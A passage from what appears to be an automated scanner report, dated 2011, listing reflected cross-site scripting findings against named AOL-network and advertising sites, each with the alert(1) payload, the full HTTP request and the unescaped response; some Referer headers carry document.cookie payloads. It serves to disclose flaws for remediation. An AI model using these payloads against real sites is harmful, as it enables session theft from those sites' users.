<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Engadget en espa..ol
...[SNIP]...
annel="wb.engadgetsp";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,es.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Inactive";
s_265.prop2="Home";
s_265.prop12="http://es.engadget.com/?cedc8"-alert(1)-"2d1d201c850=1";
s_265.prop16="Engadget en espa..ol";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="247";

var s_code=s_265.t();if(s_code)document.write(s_co
...[SNIP]...

1.105. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasy.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31dbc"-alert(1)-"afc965ac949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?31dbc"-alert(1)-"afc965ac949=1 HTTP/1.1
Host: fantasy.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:59 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999975
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 75771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
e.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Fantasy";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://fantasy.fanhouse.com/?31dbc"-alert(1)-"afc965ac949=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.106. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f4c8<script>alert(1)</script>e89e8f1416c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000820
Content-Length: 68
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:33:30 GMT
Connection: close

Not Found: /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css

1.107. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e302f<script>alert(1)</script>440171cb83a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000805
Content-Length: 68
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:33:30 GMT
Connection: close

Not Found: /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a

1.108. http://fonts.citysbest.com/uni0vle.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /uni0vle.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb692<script>alert(1)</script>13f97bad00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uni0vle.jseb692<script>alert(1)</script>13f97bad00a HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001252
Content-Length: 63
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 21:46:56 GMT
Connection: close

Not Found: /uni0vle.jseb692<script>alert(1)</script>13f97bad00a

1.109. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://golf.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3cc6"-alert(1)-"97283dc744a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f3cc6"-alert(1)-"97283dc744a=1 HTTP/1.1
Host: golf.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:01 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999884
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 65581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
anhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Golf";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://golf.fanhouse.com/?f3cc6"-alert(1)-"97283dc744a=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.110. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dafda"><script>alert(1)</script>dce0aa22300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?dafda"><script>alert(1)</script>dce0aa22300=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:04 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999995
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<link rel="canonical" href="http://green.autoblog.com/?dafda"><script>alert(1)</script>dce0aa22300=1"/>
...[SNIP]...

1.111. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd9f0"-alert(1)-"f846c73bc45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fd9f0"-alert(1)-"f846c73bc45=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:05 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
_265.pageType="";
s_265.linkInternalFilters="javascript:,autobloggreen.com,green.autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Home";
s_265.prop12="http://green.autoblog.com/?fd9f0"-alert(1)-"f846c73bc45=1";
s_265.prop16="Autoblog Green &mdash; We Obsessively Cover The Green Scene";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.112. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe6d6"-alert(1)-"cc4365a87c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:48 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:22:47 GMT; path=/
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 121605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
green.autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1";
s_265.prop16="Video: How apartment dwellers can charge their electric vehicles &mdash; Autoblog Green";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop9="bsd:19829683";

var s_code=s
...[SNIP]...

1.113. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b2f"><script>alert(1)</script>bb0719d741c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:48 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:22:47 GMT; path=/
Keep-Alive: timeout=5, max=999993
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 121677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<link rel="canonical" href="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1"/>
...[SNIP]...

1.114. http://help.aol.com/help/product/aim [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.aol.com
Path:   /help/product/aim

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d38f"><script>alert(1)</script>58a51860742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /help/product/aim?1d38f"><script>alert(1)</script>58a51860742=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=DECB310EF6EFBE26B4A427A6F179C4AD.help-dtc32; Path=/help
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_ofxifmq-b-opjq*80=ffffffffceb4d4b145525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:24:33 GMT;path=/;httponly
Content-Length: 16811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <script type
...[SNIP]...
<TextArea name="1d38f"><script>alert(1)</script>58a51860742" style="display:none;visibility:hide">
...[SNIP]...

1.115. http://help.aol.com/help/product/aim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.aol.com
Path:   /help/product/aim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15650"><script>alert(1)</script>bae15fcead9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/product/aim/?15650"><script>alert(1)</script>bae15fcead9=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=ED090F24F45894D88EFF6CE9F51FA687.help-dtc37; Path=/help
Keep-Alive: timeout=15, max=74
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_ofxifmq-b-opjq*80=ffffffffceb4a74645525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:21:53 GMT;path=/;httponly
Content-Length: 16811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <script type
...[SNIP]...
<TextArea name="15650"><script>alert(1)</script>bae15fcead9" style="display:none;visibility:hide">
...[SNIP]...

1.116. http://japanese.engadget.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://japanese.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e744"-alert(1)-"5dc6583bede was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?1e744"-alert(1)-"5dc6583bede=1 HTTP/1.1
Host: japanese.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:45 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=328aae74cc9b3a38a8e59774045c0fa7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999881
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html" c
...[SNIP]...
el="jp.engadget";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,japanese.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Home";
s_265.prop2="-";
s_265.prop12="http://japanese.engadget.com/?1e744"-alert(1)-"5dc6583bede=1";
s_265.prop16="";
s_265.prop17="Engadget";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="221";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.117. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload c0c31<script>alert(1)</script>91610088e03 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:04 GMT
Content-Type: application/x-javascript
Content-Length: 93

// Error: Unknown old section MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03

1.118. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11208<script>alert(1)</script>01e1e582feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp&11208<script>alert(1)</script>01e1e582feb=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:07 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:07 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter 11208<script>alert(1)</script>01e1e582feb

1.119. http://jlinks.industrybrains.com/jsct [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload aec99<script>alert(1)</script>9252672da8b was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTAaec99<script>alert(1)</script>9252672da8b&num=7&layt=templatebottom&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:04 GMT
Content-Type: application/x-javascript
Content-Length: 86

// Error: Site 85 has no section ELECTRONISTAaec99<script>alert(1)</script>9252672da8b

1.120. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6e2a8<script>alert(1)</script>5664779b5a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J055326e2a8<script>alert(1)</script>5664779b5a2 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/scores6d396%22-alert(document.cookie)-%222e6570a7b85
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 20:19:22 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 07 Feb 2011 20:19:22 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:19:21 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J055326E2A8<SCRIPT>ALERT(1)</SCRIPT>5664779B5A2" was not recognized.
*/

1.121. http://kr.engadget.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kr.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db35a"-alert(1)-"5ea201beed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?db35a"-alert(1)-"5ea201beed3=1 HTTP/1.1
Host: kr.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:45 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999948
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 75928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta content="text/html;
...[SNIP]...
65.server="";
s_265.channel="kr.engadget";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,kr.engadget.com";
s_265.prop1="Engadget";
s_265.prop2="Home";
s_265.prop12="http://kr.engadget.com/?db35a"-alert(1)-"5ea201beed3=1";
s_265.prop16="Engadget Korea";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="399";

var s_code=s_265.t();if(s_code)document.write(s_code)//-
...[SNIP]...

1.122. http://learn2.aol.com/learn.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn2.aol.com
Path:   /learn.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa475<script>alert(1)</script>947c52ed946 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

